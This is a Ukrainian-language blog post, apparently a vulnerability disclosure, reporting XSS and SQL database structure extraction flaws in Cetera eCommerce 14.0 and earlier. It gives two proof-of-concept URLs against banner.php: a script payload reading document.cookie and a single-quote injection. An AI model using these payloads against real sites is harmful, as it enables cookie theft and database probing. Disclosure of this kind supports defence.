XSS та SQL DB Structure Extraction уразливості в Cetera eCommerce

15:01 11.12.2010

01.10.2010

У червні, 07.06.2010, я знайшов нові Cross-Site Scripting та SQL DB Structure Extraction уразливості в системі Cetera eCommerce (онлайн магазин). Які виявив на демо сайті розробників системи http://ecommerce-demo.cetera.ru.

Раніше я вже писав про уразливості в Cetera eCommerce.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

11.12.2010

XSS:

http://site/cms/templates/banner.php?bannerId=%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL DB Structure Extraction:

http://site/cms/templates/banner.php?bannerId=’

Уразливі Cetera eCommerce 14.0 та попередні версії. Розробники в себе на сайт досі так і не виправили уразливості.


Leave a Reply

You must be logged in to post a comment.